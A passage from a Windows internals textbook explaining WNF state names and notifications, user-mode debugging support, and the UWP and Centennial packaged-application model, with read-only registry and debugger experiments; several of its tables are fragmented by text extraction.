User Device Manager
UMD
F
2
User Mode Driver Framework
UMG
R
9
User Manager
USB
8
Universal Serial Bus (USB) Stack
USO
16
Update Orchestrator
UTS
2
User Trusted Signals
UUS
1
Unknown
UWF
4
Unified Write Filter
VAN
1
Virtual Area Networks
VPN
1
Virtual Private Networks
VTS
V
2
Vault Service
WAA
S
2
Windows-as-a-Service
WBI
O
1
Windows Biometrics
WCD
S
1
Wireless LAN
WC
M
6
Windows Connection Manager
WDA
G
2
Windows Defender Application Guard
WDS
C
1
Windows Defender Security Settings
WEB
A
2
Web Authentication
WER
3
Windows Error Reporting
WFA
S
1
Windows Firewall Application Service
WFD
N
3
WiFi Display Connect (MiraCast)
WFS
5
Windows Family Safety
WHT
P
2
Windows HTTP Library
WIFI
15
Windows Wireless Network (WiFi) Stack
WIL
20
Windows Instrumentation Library
WNS
1
Windows Notification Service
WOF
1
Windows Overlay Filter
WOS
C
9
Windows One Setting Configuration
WPN
5
Windows Push Notifications
WSC
1
Windows Security Center
WSL
1
Windows Subsystem for Linux
WSQ
M
1
Windows Software Quality Metrics (SQM)
WUA
6
Windows Update
WW
5
Wireless Wire Area Network (WWAN) Service
AN
XBO
X
116
XBOX Services
WNF state names and storage
WNF state names are represented as random-looking 64-bit identifiers such
as 0xAC41491908517835 and then defined to a friendly name using C
preprocessor macros such as WNF_AUDC_CAPTURE_ACTIVE. In reality,
however, these numbers are used to encode a version number (1), a lifetime
(persistent versus temporary), a scope (process-instanced, container-
instanced, user-instanced, session-instanced, or machine-instanced), a
permanent data flag, and, for well-known state names, a prefix identifying the
owner of the state name followed by a unique sequence number. Figure 8-41
below shows this format.
Figure 8-41 Format of a WNF state name.
As mentioned earlier, state names can be well-known, which means that
they are preprovisioned for arbitrary out-of-order use. WNF achieves this by
using the registry as a backing store, which will encode the security
descriptor, maximum data size, and type ID (if any) under the
HKLM\SYSTEM\CurrentControlSet\Control\Notifications registry key. For
each state name, the information is stored under a value matching the 64-bit
encoded WNF state name identifier.
Additionally, WNF state names can also be registered as persistent,
meaning that they will remain registered for the duration of the system’s
uptime, regardless of the registrar’s process lifetime. This mimics permanent
objects that were shown in the “Object Manager” section of this chapter, and
similarly, the SeCreatePermanentPrivilege privilege is required to register
such state names. These WNF state names also live in the registry, but under
the HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\VolatileNotifications key, and take advantage of the
registry’s volatile flag to simply disappear once the machine is rebooted. You
might be confused to see “volatile” registry keys being used for “persistent”
WNF data—keep in mind that, as we just indicated, the persistence here is
within a boot session (versus attached to process lifetime, which is what
WNF calls temporary, and which we’ll see later).
Furthermore, a WNF state name can be registered as permanent, which
endows it with the ability to persist even across reboots. This is the type of
“persistence” you may have been expecting earlier. This is done by using yet
another registry key, this time without the volatile flag set, present at
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications.
Suffice it to say, the SeCreatePermanentPrivilege is needed for this level of
persistence as well. For these types of WNF states, there is an additional
registry key found below the hierarchy, called Data, which contains, for each
64-bit encoded WNF state name identifier, the last change stamp, and the
binary data. Note that if the WNF state name was never written to on your
machine, the latter information might be missing.
Experiment: View WNF state names and data in the
registry
In this experiment, you use the Registry Editor to take a look at the
well-known WNF names as well as some examples of permanent
and persistent names. By looking at the raw binary registry data,
you will be able to see the data and security descriptor information.
Open Registry Editor and navigate to the
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Notifications key.
Take a look at the values you see, which should look like the
screenshot below.
Double-click the value called 41950C3EA3BC0875
(WNF_SBS_UPDATE_AVAILABLE), which opens the raw
registry data binary editor.
Note how in the following figure, you can see the security
descriptor (the highlighted binary data, which includes the SID S-
1-5-18), as well as the maximum data size (0 bytes).
Be careful not to change any of the values you see because this
could make your system inoperable or open it up to attack.
Finally, if you want to see some examples of permanent WNF
state, use the Registry Editor to go to the
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Notifications\Data key, and look at the value
418B1D29A3BC0C75 (WNF_DSM_DSMAPPINSTALLED). An
example is shown in the following figure, in which you can see the
last application that was installed on this system
(MicrosoftWindows.UndockedDevKit).
Finally, a completely arbitrary state name can be registered as a temporary
name. Such names have a few distinctions from what was shown so far. First,
because their names are not known in advance, they do require the
consumers and producers to have some way of passing the identifier between
each other. Normally, whoever either attempts to consume the state data first
or to produce state data instead ends up internally creating and/or using the
matching registry key to store the data. However, with temporary WNF state
names, this isn’t possible because the name is based on a monotonically
increasing sequence number.
Second, and related to this fact, no registry keys are used to encode
temporary state names—they are tied to the process that registered a given
instance of a state name, and all the data is stored in kernel pool only. These
types of names, for example, are used to implement the per-process wake
channels described earlier. Other uses include power manager notifications,
and direct service triggers used by the SCM.
WNF publishing and subscription model
When publishers leverage WNF, they do so by following a standard pattern
of registering the state name (in the case of non-well-known state names) and
publishing some data that they want to expose. They can also choose not to
publish any data but simply provide a 0-byte buffer, which serves as a way to
“light up” the state and signals the subscribers anyway, even though no data
was stored.
Consumers, on the other hand, use WNF’s registration capabilities to
associate a callback with a given WNF state name. Whenever a change is
published, this callback is activated, and, for kernel mode, the caller is
expected to call the appropriate WNF API to retrieve the data associated with
the state name. (The buffer size is provided, allowing the caller to allocate
some pool, if needed, or perhaps choose to use the stack.) For user mode, on
the other hand, the underlying WNF notification mechanism inside of
Ntdll.dll takes care of allocating a heap-backed buffer and providing a
pointer to this data directly to the callback registered by the subscriber.
In both cases, the callback also provides the change stamp, which acts as a
unique monotonic sequence number that can be used to detect missed
published data (if a subscriber was inactive, for some reason, and the
publisher continued to produce changes). Additionally, a custom context can
be associated with the callback, which is useful in C++ situations to tie the
static function pointer to its class.
Note
WNF provides an API for querying whether a given WNF state name has
been registered yet (allowing a consumer to implement special logic if it
detects the producer must not yet be active), as well as an API for
querying whether there are any subscriptions currently active for a given
state name (allowing a publisher to implement special logic such as
perhaps delaying additional data publication, which would override the
previous state data).
WNF manages what might be thousands of subscriptions by associating a
data structure with each kernel and/or user-mode subscription and tying all
the subscriptions for a given WNF state name together. This way, when a
state name is published to, the list of subscriptions is parsed, and, for user
mode, a delivery payload is added to a linked list followed by the signaling
of a per-process notification event—this instructs the WNF delivery code in
Ntdll.dll to call the API to consume the payload (and any other additional
delivery payloads that were added to the list in the meantime). For kernel
mode, the mechanism is simpler—the callback is synchronously executed in
the context of the publisher.
Note that it’s also possible to subscribe to notifications in two modes:
data-notification mode, and meta-notification mode. The former does what
one might expect—executing the callback when new data has been
associated with a WNF state name. The latter is more interesting because it
sends notifications when a new consumer has become active or inactive, as
well as when a publisher has terminated (in the case of a volatile state name,
where such a concept exists).
Finally, it’s worth pointing out that user-mode subscriptions have an
additional wrinkle: Because Ntdll.dll manages the WNF notifications for the
entire process, it’s possible for multiple components (such as dynamic
libraries/DLLs) to have requested their own callback for the same WNF state
name (but for different reasons and with different contexts). In this situation,
the Ntdll.dll library needs to associate registration contexts with each
module, so that the per-process delivery payload can be translated into the
appropriate callback and only delivered if the requested delivery mode
matches the notification type of the subscriber.
Experiment: Using the WnfDump utility to dump
WNF state names
In this experiment, you use one of the book tools (WnfDump) to
register a WNF subscription to the
WNF_SHEL_DESKTOP_APPLICATION_STARTED state name
and the WNF_AUDC_RENDER state name.
Execute wnfdump on the command line with the following
flags:
Click here to view code image
-i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
The tool displays information about the state name and reads its
data, such as shown in the following output:
Click here to view code image
C:\>wnfdump.exe -i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
WNF State Name | S | L |
P | AC | N | CurSize | MaxSize
------------------------------------------------------------
-------------------------------
WNF_SHEL_DESKTOP_APPLICATION_STARTED | S | W |
N | RW | I | 28 | 512
65 00 3A 00 6E 00 6F 00-74 00 65 00 70 00 61 00
e.:.n.o.t.e.p.a.
64 00 2E 00 65 00 78 00-65 00 00 00
d...e.x.e...
Because this event is associated with Explorer (the shell) starting
desktop applications, you will see one of the last applications you
double-clicked, used the Start menu or Run menu for, or, in
general, anything that the ShellExecute API was used on. The
change stamp is also shown, which will end up a counter of how
many desktop applications have been started this way since booting
this instance of Windows (as this is a persistent, but not permanent,
event).
Launch a new desktop application such as Paint by using the
Start menu and try the wnfdump command again. You should see
the change stamp incremented and new binary data shown.
WNF event aggregation
Although WNF on its own provides a powerful way for clients and services
to exchange state information and be notified of each other’s statuses, there
may be situations where a given client/subscriber is interested in more than a
single WNF state name.
For example, there may be a WNF state name that is published whenever
the screen backlight is off, another when the wireless card is powered off,
and yet another when the user is no longer physically present. A subscriber
may want to be notified when all of these WNF state names have been
published—yet another may require a notification when either the first two
or the latter has been published.
Unfortunately, the WNF system calls and infrastructure provided by
Ntdll.dll to user-mode clients (and equally, the API surface provided by the
kernel) only operate on single WNF state names. Therefore, the kinds of
examples given would require manual handling through a state machine that
each subscriber would need to implement.
To facilitate this common requirement, a component exists both in user
mode as well as in kernel mode that handles the complexity of such a state
machine and exposes a simple API: the Common Event Aggregator (CEA)
implemented in CEA.SYS for kernel-mode callers and EventAggregation.dll
for user-mode callers. These libraries export a set of APIs (such as
EaCreateAggregatedEvent and EaSignalAggregatedEvent), which allow an
interrupt-type behavior (a start callback while a WNF state is true, and a stop
callback once the WNF state if false) as well as the combination of
conditions with operators such as AND, OR, and NOT.
Users of CEA include the USB Stack as well as the Windows Driver
Foundation (WDF), which exposes a framework callback for WNF state
name changes. Further, the Power Delivery Coordinator (Pdc.sys) uses CEA
to build power state machines like the example at the beginning of this
subsection. The Unified Background Process Manager (UBPM) described in
Chapter 9 also relies on CEA to implement capabilities such as starting and
stopping services based on low power and/or idle conditions.
Finally, WNF is also integral to a service called the System Event Broker
(SEB), implemented in SystemEventsBroker.dll and whose client library
lives in SystemEventsBrokerClient.dll. The latter exports APIs such as
SebRegisterPrivateEvent, SebQueryEventData, and SebSignalEvent, which
are then passed through an RPC interface to the service. In user mode, SEB is
a cornerstone of the Universal Windows Platform (UWP) and the various
APIs that interrogate system state, and services that trigger themselves based
on certain state changes that WNF exposes. Especially on OneCore-derived
systems such as Windows Phone and XBOX (which, as was shown earlier,
make up more than a few hundred of the well-known WNF state names),
SEB is a central powerhouse of system notification capabilities, replacing the
legacy role that the Window Manager provided through messages such as
WM_DEVICEARRIVAL, WM_SESSIONENDCHANGE, WM_POWER, and
others.
SEB pipes into the Broker Infrastructure (BI) used by UWP applications
and allows applications, even when running under an AppContainer, to
access WNF events that map to systemwide state. In turn, for WinRT
applications, the Windows.ApplicationModel.Background namespace
exposes a SystemTrigger class, which implements IBackgroundTrigger, that
pipes into the SEB’s RPC services and C++ API, for certain well-known
system events, which ultimately transforms to WNF_SEB_XXX event state
names. It serves as a perfect example of how something highly
undocumented and internal, such as WNF, can ultimately be at the heart of a
high-level documented API for Modern UWP application development. SEB
is only one of the many brokers that UWP exposes, and at the end of the
chapter, we cover background tasks and the Broker Infrastructure in full
detail.
User-mode debugging
Support for user-mode debugging is split into three different modules. The
first one is located in the executive itself and has the prefix Dbgk, which
stands for Debugging Framework. It provides the necessary internal
functions for registering and listening for debug events, managing the debug
object, and packaging the information for consumption by its user-mode
counterpart. The user-mode component that talks directly to Dbgk is located
in the native system library, Ntdll.dll, under a set of APIs that begin with the
prefix DbgUi. These APIs are responsible for wrapping the underlying debug
object implementation (which is opaque), and they allow all subsystem
applications to use debugging by wrapping their own APIs around the DbgUi
implementation. Finally, the third component in user-mode debugging
belongs to the subsystem DLLs. It is the exposed, documented API (located
in KernelBase.dll for the Windows subsystem) that each subsystem supports
for performing debugging of other applications.
Kernel support
The kernel supports user-mode debugging through an object mentioned
earlier: the debug object. It provides a series of system calls, most of which
map directly to the Windows debugging API, typically accessed through the
DbgUi layer first. The debug object itself is a simple construct, composed of
a series of flags that determine state, an event to notify any waiters that
debugger events are present, a doubly linked list of debug events waiting to
be processed, and a fast mutex used for locking the object. This is all the
information that the kernel requires for successfully receiving and sending
debugger events, and each debugged process has a debug port member in its
executive process structure pointing to this debug object.
Once a process has an associated debug port, the events described in Table
8-32 can cause a debug event to be inserted into the list of events.
Table 8-32 Kernel-mode debugging events
Eve
nt
Ide
ntifi
er
Meaning
Triggered By
Dbg
Km
Exc
epti
onA
pi
An
exception
has
occurred.
KiDispatchException during an exception that
occurred in user mode.
Dbg
Km
Cre
ateT
A new
thread has
been
created.
Startup of a user-mode thread.
hrea
dAp
i
Dbg
Km
Cre
ateP
roce
ssA
pi
A new
process
has been
created.
Startup of a user-mode thread that is the first
thread in the process, if the CreateReported flag is
not already set in EPROCESS.
Dbg
Km
Exit
Thr
ead
Api
A thread
has exited.
Death of a user-mode thread, if the ThreadInserted
flag is set in ETHREAD.
Dbg
Km
Exit
Pro
cess
Api
A process
has exited.
Death of a user-mode thread that was the last
thread in the process, if the ThreadInserted flag is
set in ETHREAD.
Dbg
Km
Loa
dDll
Api
A DLL
was
loaded.
NtMapViewOfSection when the section is an image
file (could be an EXE as well), if the
SuppressDebugMsg flag is not set in the TEB.
Dbg
Km
Unl
oad
A DLL
was
unloaded.
NtUnmapViewOfSection when the section is an
image file (could be an EXE as well), if the
SuppressDebugMsg flag is not set in the TEB.
Dll
Api
Dbg
Km
Err
orR
epor
tApi
A user-
mode
exception
must be
forwarded
to WER.
This special case message is sent over ALPC, not
the debug object, if the DbgKmExceptionApi
message returned
DBG_EXCEPTION_NOT_HANDLED, so that
WER can now take over exception processing.
Apart from the causes mentioned in the table, there are a couple of special
triggering cases outside the regular scenarios that occur at the time a
debugger object first becomes associated with a process. The first create
process and create thread messages will be manually sent when the debugger
is attached, first for the process itself and its main thread and followed by
create thread messages for all the other threads in the process. Finally, load
dll events for the executable being debugged, starting with Ntdll.dll and then
all the current DLLs loaded in the debugged process will be sent. Similarly,
if a debugger is already attached, but a cloned process (fork) is created, the
same events will also be sent for the first thread in the clone (as instead of
just Ntdll.dll, all other DLLs are also present in the cloned address space).
There also exists a special flag that can be set on a thread, either during
creation or dynamically, called hide from debugger. When this flag is turned
on, which results in the HideFromDebugger flag in the TEB to be set, all
operations done by the current thread, even if the debug port has a debug
port, will not result in a debugger message.
Once a debugger object has been associated with a process, the process
enters the deep freeze state that is also used for UWP applications. As a
reminder, this suspends all threads and prevents any new remote thread
creation. At this point, it is the debugger’s responsibility to start requesting
that debug events be sent through. Debuggers usually request that debug
events be sent back to user mode by performing a wait on the debug object.
This call loops the list of debug events. As each request is removed from the
list, its contents are converted from the internal DBGK structure to the native
structure that the next layer up understands. As you’ll see, this structure is
different from the Win32 structure as well, and another layer of conversion
has to occur. Even after all pending debug messages have been processed by
the debugger, the kernel does not automatically resume the process. It is the
debugger’s responsibility to call the ContinueDebugEvent function to resume
execution.
Apart from some more complex handling of certain multithreading issues,
the basic model for the framework is a simple matter of producers—code in
the kernel that generates the debug events in the previous table—and
consumers—the debugger waiting on these events and acknowledging their
receipt.
Native support
Although the basic protocol for user-mode debugging is quite simple, it’s not
directly usable by Windows applications—instead, it’s wrapped by the
DbgUi functions in Ntdll.dll. This abstraction is required to allow native
applications, as well as different subsystems, to use these routines (because
code inside Ntdll.dll has no dependencies). The functions that this component
provides are mostly analogous to the Windows API functions and related
system calls. Internally, the code also provides the functionality required to
create a debug object associated with the thread. The handle to a debug object
that is created is never exposed. It is saved instead in the thread environment
block (TEB) of the debugger thread that performs the attachment. (For more
information on the TEB, see Chapter 4 of Part 1.) This value is saved in the
DbgSsReserved[1] field.
When a debugger attaches to a process, it expects the process to be broken
into—that is, an int 3 (breakpoint) operation should have happened,
generated by a thread injected into the process. If this didn’t happen, the
debugger would never actually be able to take control of the process and
would merely see debug events flying by. Ntdll.dll is responsible for creating
and injecting that thread into the target process. Note that this thread is
created with a special flag, which the kernel sets on the TEB, which results in
the SkipThreadAttach flag to be set, avoiding DLL_THREAD_ATTACH
notifications and TLS slot usage, which could cause unwanted side effects
each time a debugger would break into the process.
Finally, Ntdll.dll also provides APIs to convert the native structure for
debug events into the structure that the Windows API understands. This is
done by following the conversions in Table 8-33.
Table 8-33 Native to Win32 conversions
Native
State
Change
Win32 State
Change
Details
DbgCreat
eThreadSt
ateChange
CREATE_THREAD
_DEBUG_EVENT
DbgCreat
eProcessSt
ateChange
CREATE_PROCES
S_DEBUG_EVENT
lpImageName is always NULL,
and fUnicode is always TRUE.
DbgExitTh
readState
Change
EXIT_THREAD_D
EBUG_EVENT
DbgExitPr
ocessState
Change
EXIT_PROCESS_D
EBUG_EVENT
DbgExcep
tionStateC
hange
DbgBreak
pointState
Change
DbgSingle
StepStateC
hange
OUTPUT_DEBUG_
STRING_EVENT,
RIP_EVENT, or
EXCEPTION_DEB
UG_EVENT
Determination is based on the
Exception Code (which can be
DBG_PRINTEXCEPTION_C /
DBG_PRINTEXCEPTION_WIDE
_C,
DBG_RIPEXCEPTION, or
something else).
DbgLoad
DllStateC
hange
LOAD_DLL_DEBU
G_EVENT
fUnicode is always TRUE
DbgUnloa
dDllState
Change
UNLOAD_DLL_D
EBUG_EVENT
EXPERIMENT: Viewing debugger objects
Although you’ve been using WinDbg to do kernel-mode
debugging, you can also use it to debug user-mode programs. Go
ahead and try starting Notepad.exe with the debugger attached
using these steps:
1.
Run WinDbg, and then click File, Open Executable.
2.
Navigate to the \Windows\System32\ directory and choose
Notepad.exe.
3.
You’re not going to do any debugging, so simply ignore
whatever might come up. You can type g in the command
window to instruct WinDbg to continue executing Notepad.
Now run Process Explorer and be sure the lower pane is enabled
and configured to show open handles. (Select View, Lower Pane
View, and then Handles.) You also want to look at unnamed
handles, so select View, Show Unnamed Handles And
Mappings.
Next, click the Windbg.exe (or EngHost.exe, if you’re using the
WinDbg Preview) process and look at its handle table. You should
see an open, unnamed handle to a debug object. (You can organize
the table by Type to find this entry more readily.) You should see
something like the following:
You can try right-clicking the handle and closing it. Notepad
should disappear, and the following message should appear in
WinDbg:
Click here to view code image
ERROR: WaitForEvent failed, NTSTATUS 0xC0000354
This usually indicates that the debuggee has been
killed out from underneath the debugger.
You can use .tlist to see if the debuggee still exists.
In fact, if you look at the description for the NTSTATUS code
given, you will find the text: “An attempt to do an operation on a
debug port failed because the port is in the process of being
deleted,” which is exactly what you’ve done by closing the handle.
As you can see, the native DbgUi interface doesn’t do much work to
support the framework except for this abstraction. The most complicated task
it does is the conversion between native and Win32 debugger structures. This
involves several additional changes to the structures.
Windows subsystem support
The final component responsible for allowing debuggers such as Microsoft
Visual Studio or WinDbg to debug user-mode applications is in
KernelBase.dll. It provides the documented Windows APIs. Apart from this
trivial conversion of one function name to another, there is one important
management job that this side of the debugging infrastructure is responsible
for: managing the duplicated file and thread handles.
Recall that each time a load DLL event is sent, a handle to the image file is
duplicated by the kernel and handed off in the event structure, as is the case
with the handle to the process executable during the create process event.
During each wait call, KernelBase.dll checks whether this is an event that
results in a new duplicated process and/or thread handles from the kernel (the
two create events). If so, it allocates a structure in which it stores the process
ID, thread ID, and the thread and/or process handle associated with the event.
This structure is linked into the first DbgSsReserved array index in the TEB,
where we mentioned the debug object handle is stored. Likewise,
KernelBase.dll also checks for exit events. When it detects such an event, it
“marks” the handles in the data structure.
Once the debugger is finished using the handles and performs the continue
call, KernelBase.dll parses these structures, looks for any handles whose
threads have exited, and closes the handles for the debugger. Otherwise,
those threads and processes would never exit because there would always be
open handles to them if the debugger were running.
Packaged applications
Starting with Windows 8, there was a need for some APIs that run on
different kind of devices, from a mobile phone, up to an Xbox and to a fully-
fledged personal computer. Windows was indeed starting to be designed even
for new device types, which use different platforms and CPU architectures
(ARM is a good example). A new platform-agnostic application architecture,
Windows Runtime (also known as “WinRT”) was first introduced in
Windows 8. WinRT supported development in C++, JavaScript, and
managed languages (C#, VB.Net, and so on), was based on COM, and
supported natively both x86, AMD64, and ARM processors. Universal
Windows Platform (UWP) is the evolution of WinRT. It has been designed to
overcome some limitations of WinRT and it is built on the top of it. UWP
applications no longer need to indicate which OS version has been developed
for in their manifest, but instead they target one or more device families.
UWP provides Universal Device Family APIs, which are guaranteed to be
present in all device families, and Extension APIs, which are device specific.
A developer can target one device type, adding the extension SDK in its
manifest; furthermore, she can conditionally test the presence of an API at
runtime and adapt the app’s behavior accordingly. In this way, a UWP app
running on a smartphone may start behaving the way it would if it were
running on a PC when the phone is connected to a desktop computer or a
suitable docking station.
UWP provides multiple services to its apps:
■ Adaptive controls and input—the graphical elements respond to the
size and DPI of the screen by adjusting their layout and scale.
Furthermore, the input handling is abstracted to the underlying app.
This means that a UWP app works well on different screens and with
different kinds of input devices, like touch, a pen, a mouse, keyboard,
or an Xbox controller
■ One centralized store for every UWP app, which provides a seamless
install, uninstall, and upgrade experience
■ A unified design system, called Fluent (integrated in Visual Studio)
■ A sandbox environment, which is called AppContainer
AppContainers were originally designed for WinRT and are still used for
UWP applications. We already covered the security aspects of
AppContainers in Chapter 7 of Part 1.
To properly execute and manage UWP applications, a new application
model has been built in Windows, which is internally called AppModel and
stands for “Modern Application Model.” The Modern Application Model has
evolved and has been changed multiple times during each release of the OS.
In this book, we analyze the Windows 10 Modern Application Model.
Multiple components are part of the new model and cooperate to correctly
manage the states of the packaged application and its background activities in
an energy-efficient manner.
■ Host Activity Manager (HAM) The Host activity manager is a new
component, introduced in Windows 10, which replaces and integrates
many of the old components that control the life (and the states) of a
UWP application (Process Lifetime Manager, Foreground Manager,
Resource Policy, and Resource Manager). The Host Activity Manager
lives in the Background Task Infrastructure service
(BrokerInfrastructure), not to be confused with the Background
Broker Infrastructure component, and works deeply tied to the
Process State Manager. It is implemented in two different libraries,
which represent the client (Rmclient.dll) and server
(PsmServiceExtHost.dll) interface.
■ Process State Manager (PSM) PSM has been partly replaced by
HAM and is considered part of the latter (actually PSM became a
HAM client). It maintains and stores the state of each host of the
packaged application. It is implemented in the same service of the
HAM (BrokerInfrastructure), but in a different DLL: Psmsrv.dll.
■ Application Activation Manager (AAM) AAM is the component
responsible in the different kinds and types of activation of a
packaged application. It is implemented in the ActivationManager.dll
library, which lives in the User Manager service. Application
Activation Manager is a HAM client.
■ View Manager (VM) VM detects and manages UWP user interface
events and activities and talks with HAM to keep the UI application
in the foreground and in a nonsuspended state. Furthermore, VM
helps HAM in detecting when a UWP application goes into
background state. View Manager is implemented in the
CoreUiComponents.dll .Net managed library, which depends on the
Modern Execution Manager client interface (ExecModelClient.dll) to
properly register with HAM. Both libraries live in the User Manager
service, which runs in a Sihost process (the service needs to proper
manage UI events)
■ Background Broker Infrastructure (BI) BI manages the
applications background tasks, their execution policies, and events.
The core server is implemented mainly in the bisrv.dll library,
manages the events that the brokers generate, and evaluates the
policies used to decide whether to run a background task. The
Background Broker Infrastructure lives in the BrokerInfrastructure
service and, at the time of this writing, is not used for Centennial
applications.
There are some other minor components that compose the new application
model that we have not mentioned here and are beyond the scope of this
book.
With the goal of being able to run even standard Win32 applications on
secure devices like Windows 10 S, and to enable the conversion of old
application to the new model, Microsoft has designed the Desktop Bridge
(internally called Centennial). The bridge is available to developers through
Visual Studio or the Desktop App Converter. Running a Win32 application
in an AppContainer, even if possible, is not recommended, simply because
the standard Win32 applications are designed to access a wider system API
surface, which is much reduced in AppContainers.
UWP applications
We already covered an introduction of UWP applications and described the
security environment in which they run in Chapter 7 of Part 1. To better
understand the concepts expressed in this chapter, it is useful to define some
basic properties of the modern UWP applications. Windows 8 introduced
significant new properties for processes:
■ Package identity
■ Application identity
■ AppContainer
■ Modern UI
We have already extensively analyzed the AppContainer (see Chapter 7 in
Part 1). When the user downloads a modern UWP application, the
application usually came encapsulated in an AppX package. A package can
contain different applications that are published by the same author and are
linked together. A package identity is a logical construct that uniquely
defines a package. It is composed of five parts: name, version, architecture,
resource id, and publisher. The package identity can be represented in two
ways: by using a Package Full Name (formerly known as Package Moniker),
which is a string composed of all the single parts of the package identity,
concatenated by an underscore character; or by using a Package Family
name, which is another string containing the package name and publisher.
The publisher is represented in both cases by using a Base32-encoded string
of the full publisher name. In the UWP world, the terms “Package ID” and
“Package full name” are equivalent. For example, the Adobe Photoshop
package is distributed with the following full name:
AdobeSystemsIncorporated.AdobePhotoshopExpress_2.6.235.0_neutral_s
plit.scale-125_ynb6jyjzte8ga, where
■ AdobeSystemsIncorporated.AdobePhotoshopExpress is the name of
the package.
■ 2.6.235.0 is the version.
■ neutral is the targeting architecture.
■ split_scale is the resource id.
■ ynb6jyjzte8ga is the base32 encoding (Crockford’s variant, which
excludes the letters i, l, u, and o to avoid confusion with digits) of the
publisher.
Its package family name is the simpler
“AdobeSystemsIncorporated.AdobePhotoshopExpress_ynb6jyjzte8ga”
string.
Every application that composes the package is represented by an
application identity. An application identity uniquely identifies the collection
of windows, processes, shortcuts, icons, and functionality that form a single
user-facing program, regardless of its actual implementation (so this means
that in the UWP world, a single application can be composed of different
processes that are still part of the same application identity). The application
identity is represented by a simple string (in the UWP world, called Package
Relative Application ID, often abbreviated as PRAID). The latter is always
combined with the package family name to compose the Application User
Model ID (often abbreviated as AUMID). For example, the Windows
modern Start menu application has the following AUMID:
Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App, where the
App part is the PRAID.
Both the package full name and the application identity are located in the
WIN://SYSAPPID Security attribute of the token that describes the modern
application security context. For an extensive description of the security
environment in which the UWP applications run, refer to Chapter 7 in Part 1.
Centennial applications
Starting from Windows 10, the new application model became compatible
with standard Win32 applications. The only procedure that the developer
needs to do is to run the application installer program with a special
Microsoft tool called Desktop App Converter. The Desktop App Converter
launches the installer under a sandboxed server Silo (internally called Argon
Container) and intercepts all the file system and registry I/O that is needed to
create the application package, storing all its files in VFS (virtualized file
system) private folders. Entirely describing the Desktop App Converter
application is outside the scope of this book. You can find more details of
Windows Containers and Silos in Chapter 3 of Part 1.
The Centennial runtime, unlike UWP applications, does not create a
sandbox where Centennial processes are run, but only applies a thin
virtualization layer on the top of them. As result, compared to standard
Win32 programs, Centennial applications don’t have lower security
capabilities, nor do they run with a lower integrity-level token. A Centennial
application can even be launched under an administrative account. This kind
of application runs in application silos (internally called Helium Container),
which, with the goal of providing State separation while maintaining
compatibility, provides two forms of “jails”: Registry Redirection and Virtual
File System (VFS). Figure 8-42 shows an example of a Centennial
application: Kali Linux.
Figure 8-42 Kali Linux distributed on the Windows Store is a typical
example of Centennial application.
At package activation, the system applies registry redirection to the
application and merges the main system hives with the Centennial
Application registry hives. Each Centennial application can include three
different registry hives when installed in the user workstation: registry.dat,
user.dat, and (optionally) userclasses.dat. The registry files generated by the
Desktop Convert represent “immutable” hives, which are written at
installation time and should not change. At application startup, the
Centennial runtime merges the immutable hives with the real system registry
hives (actually, the Centennial runtime executes a “detokenizing” procedure
because each value stored in the hive contains relative values).
The registry merging and virtualization services are provided by the
Virtual Registry Namespace Filter driver (WscVReg), which is integrated in
the NT kernel (Configuration Manager). At package activation time, the user
mode AppInfo service communicates with the VRegDriver device with the
goal of merging and redirecting the registry activity of the Centennial
applications. In this model, if the app tries to read a registry value that is
present in the virtualized hives, the I/O is actually redirected to the package
hives. A write operation to this kind of value is not permitted. If the value
does not already exist in the virtualized hive, it is created in the real hive
without any kind of redirection at all. A different kind of redirection is
instead applied to the entire HKEY_CURRENT_USER root key. In this key,
each new subkey or value is stored only in the package hive that is stored in
the following path: C:\ProgramData\Packages\<PackageName>\
<UserSid>\SystemAppData\Helium\Cache. Table 8-34 shows a summary of
the Registry virtualization applied to Centennial applications:
Table 8-34 Registry virtualization applied to Centennial applications
Operation
Result
Read or
enumeration
of
HKEY_LOC
AL_MACHI
NE\Software
The operation returns a dynamic merge of the package
hives with the local system counterpart. Registry keys
and values that exist in the package hives always have
precedence with respect to keys and values that already
exist in the local system.
All writes to
HKEY_CU
RRENT_US
ER
Redirected to the Centennial package virtualized hive.
All writes
inside the
package
Writes to HKEY_LOCAL_MACHINE\Software are not
allowed if a registry value exists in one of the package
hives.
All writes
outside the
package
Writes to HKEY_LOCAL_MACHINE\Software are
allowed as long as the value does not already exist in
one of the package hives.
When the Centennial runtime sets up the Silo application container, it
walks all the file and directories located into the VFS folder of the package.
This procedure is part of the Centennial Virtual File System configuration
that the package activation provides. The Centennial runtime includes a list
of mapping for each folder located in the VFS directory, as shown in Table
8-35.
Table 8-35 List of system folders that are virtualized for Centennial apps
Folder Name
Redirection Target
Architectu
re
SystemX86
C:\Windows\SysWOW64
32-bit/64-
bit
System
C:\Windows\System32
32-bit/64-
bit
SystemX64
C:\Windows\System32
64-bit only
ProgramFilesX86
C:\Program Files (x86)
32-bit/64-
bit
ProgramFilesX64
C:\Program Files
64-bit only
ProgramFilesCommon
X86
C:\Program Files
(x86)\Common Files
32-bit/64-
bit
ProgramFilesCommon
X64
C:\Program Files\Common Files
64-bit only
Windows
C:\Windows
Neutral
CommonAppData
C:\ProgramData
Neutral
The File System Virtualization is provided by three different drivers,
which are heavily used for Argon containers:
■ Windows Bind minifilter driver (BindFlt) Manages the redirection
of the Centennial application’s files. This means that if the Centennial
app wants to read or write to one of its existing virtualized files, the
I/O is redirected to the file’s original position. When the application
creates instead a file on one of the virtualized folders (for example, in
C:\Windows), and the file does not already exist, the operation is
allowed (assuming that the user has the needed permissions) and the
redirection is not applied.
■ Windows Container Isolation minifilter driver (Wcifs)
Responsible for merging the content of different virtualized folders
(called layers) and creating a unique view. Centennial applications
use this driver to merge the content of the local user’s application data
folder (usually C:\Users\<UserName>\AppData) with the app’s
application cache folder, located in C:\User\
<UserName>\Appdata\Local\Packages\<Package Full
Name\LocalCache. The driver is even able to manage the merge of
multiple packages, meaning that each package can operate on its own
private view of the merged folders. To support this feature, the driver
stores a Layer ID of each package in the Reparse point of the target
folder. In this way, it can construct a layer map in memory and is able
to operate on different private areas (internally called Scratch areas).
This advanced feature, at the time of this writing, is configured only
for related set, a feature described later in the chapter.
■ Windows Container Name Virtualization minifilter driver
(Wcnfs) While Wcifs driver merges multiple folders, Wcnfs is used
